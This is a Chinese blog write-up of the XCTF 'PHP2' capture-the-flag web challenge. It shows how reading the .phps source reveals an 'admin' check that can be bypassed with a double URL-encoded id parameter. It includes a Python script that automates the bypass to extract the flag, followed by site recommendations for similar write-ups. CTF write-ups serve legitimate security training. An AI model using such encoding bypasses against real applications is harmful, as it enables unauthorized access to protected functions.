CTF_EXP02:XCTF PHP2

最新推荐文章于 2021-04-30 23:52:30 发布
最新推荐文章于 2021-04-30 23:52:30 发布
阅读量272 收藏
点赞数 1
分类专栏: CTF_EXP编写 文章标签: exp python 安全 XCTF PHP2 writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/109055810
版权

CTF_EXP02: XCTF PHP2

题目:XCTF PHP2

启动靶机,打开环境:
在这里插入图片描述
你能浏览这个网站嘛?

首先访问index.php,可以正常访问,尝试查看index.phps文件(.phps文件就是php的源代码文件,通常用于提供给访问者查看php代码):
在这里插入图片描述
得到网页的源代码,分析代码:
需要传入变量id的值,不能等于admin,经过URL解码后等于admin将输出key,因为服务器会进行一次URL解码,所以我们将admin进行二次编码:
在这里插入图片描述
在这里插入图片描述
得到最后的传输值为:

?id=%2561%2564%256d%2569%256e

传输数据得到flag
在这里插入图片描述

EXP如下:

# -*- coding:utf-8 -*-
# name: Meng
# mail: 614886708@qq.com
# ctf_exp02: XCTF PHP2

import requests
import re


class PostUrl:
    def __init__(self, url_input):
        # 对输入的url做补全
        if url_input.endswith('index.php') or url_input.endswith('index.php/'):
            self.url = url_input
        elif url_input.endswith('/'):
            self.url = url_input + 'index.php'
        else:
            self.url = url_input + '/index.php'

        self.data = {'id': '%61%64%6d%69%6e'}   # 需要传递的数据
        self.flag = ''    # 最终flag

    def get_flag(self):
        r = requests.get(self.url)

        # 判断返回页面内容
        if 'Can you anthenticate to this website?' in r.text:
            r = requests.get(self.url + 's')
            if '<?php' in r.text:
                r = requests.get(self.url, params=self.data)

        # 过滤返回内容
        try:
            self.flag = re.search(r'cyberpeace\{.+\}', r.text).group()
        except AttributeError:
            print('未发现flag!')

    def run(self):
        self.get_flag()
        return self.flag


if __name__ == '__main__':
    print('ctf_exp02: XCTF PHP2')
    url_input = input('请输入题目链接:')
    print(PostUrl(url_input).run())
    input()     # 防止退出cmd

输入题目链接,得到flag:
在这里插入图片描述

Senimo_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 PHP2 解题详析
等风来
05-20 5273
index.php是一个常见的文件名,通常用于Web服务器中的网站根目录下。它是默认的主页文件名,在访问一个网站时,如果没有特别指定页面文件名,则服务器会自动加载index.php文件。在Web应用程序中,index.php文件通常是网站的入口文件。它包含了处理用户请求的代码,与数据库进行交互并生成页面的相关内容等,同时,它是连接后端逻辑与前端界面的桥梁之一。这种特殊模式通常用于演示和共享PHP代码,而不是作为生产环境中的主要文件扩展名。将admin进行两次URL编码,再GET传参即可。
ctfphp语言2
最新发布
2201_76123071的博客
01-01 135
ctfphp
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1753
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正题之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
CTF】攻防世界——PHP2(web)
x1a0he1的博客
07-28 1505
打开网页,只有这样一句话。源码里没有注释,没有<head>,响应包里也没什么信息。 御剑扫目录,扫出index.phps 这里的原理是php有很多后缀名都可以正确解析,这点通常用于绕过文件上传的黑名单限制。结合题目php2也可以想到这一点,不过phps我是真的不知道,所以手工没测出来。 访问获得源码,测试?id=admin可知是index.php的源码 接着分析下面的代码,可...
攻防世界 php2,CTF-攻防世界-PHP2
weixin_34517745的博客
03-28 245
题目 解题过程扫了下端口和目录,没发现啥有用的信息。。。看了下提示,需要用到php源文件phps(咱之前没听说过)if("admin"===$_GET[id]) {echo("not allowed!");exit();}$_GET[id] = urldecode($_GET[id]);if($_GET[id] == "admin"){echo "Access granted!";ec...
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTF中Web和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 ...team02 ctf:024b1d ssh:2202 po
CTF_UNICON2020:netwars平台上托管的UNICON 2020 CTF编写
02-17
CTF_UNICON2020 netwars平台上托管的UNICON 2020 CTF编写UNICON >>> KnowYourPayloads.counterhack.com CTF 招聘人员下载了执行某种恶意软件的resume.doc之后,我们在端点上检测到恶意活动。 我们能够使该端点脱机,...
xctfphp2
小白渣的博客
10-21 646
第一次看到就想到用菜刀或者蚁剑连上看看,能不能直接控制,去后台找找看有无flag 结果都失败了,于是就访问了index.php,看看有啥,结果也没什么东西,于是用御剑扫扫看后台,也扫不出来啥东西 于是在php后面加上了s,看看能不能直接读取源码,结果源码直接出来了。 于是分析了一下源码要二次url编码,在网上找了一下a的url的编码表,知道了a的url编码为%61,于是对%进行了二次编码,得到了...
#XCTF整理#PHP2
vircorns的博客
09-23 166
做题地址 知识点 .phps——PHP源代码文件 url二次编码 wp 利用index.phps文件看到源代码 url二次编码,a编码为%61,%编码为%25,因此构造: ?id=%2561dmin
攻防世界XCTFPHP2
末初的CSDN博客
03-08 286
使用目录扫描工具 这就是内容,可以发现对提交的参数,get获取后进行了一次url编码, 而id值在传的过程中本身就是会被urldecode编码一次。所以进行两次编码?id=admin 对admin进行两次url编码,提交即可 ?id=%2561%2564%256D%2569%256E ...
XCTF进阶WEB之PHP2解题思路
克格莫
12-24 773
此处看了大佬的题解才知道先访问.phps查看到源码: <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "<p>Ac...
ctfphp常见的考点
热门推荐
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
PHP2攻防世界xctf web
weixin_45689999的博客
03-02 164
PHP2 打开后,F12没有发现什么 御剑扫描 于是我们打开首页查看 http://111.198.29.45:31636/index.php 跟原来一模一样,于是把php换成phps phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MI...
**XCTF PHP2 解题步骤**
Silbigbear的博客
11-27 351
XCTF PHP2 解题步骤 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界...
XCTF-php2
qq_39543838的博客
03-03 144
http://111.200.241.244:39993/ 打开后,发现无内容,目录扫描发现 http://111.200.241.244:39993/index.php 打开为空白页 使用phps查看,发现源码泄露,得到源码 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "
XCTF 攻防世界】WEB 高手进阶区PHP2
weixin_45844670的博客
08-25 381
题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4820&page=1 预备知识: 1,什么是phps文件? phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类
六一战队夺魁青少年CTF擂台赛2024_round1:Web与Pwn解题揭秘
青少年CTF擂台挑战赛2024第一轮(#round 1)是一项针对青少年的信息安全竞赛,参赛队伍sixone战队在本次比赛中取得了显著的成绩。比赛涵盖多种技术领域,包括Web应用安全(Web1到Web5)、逆向工程(Reverse1)、密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值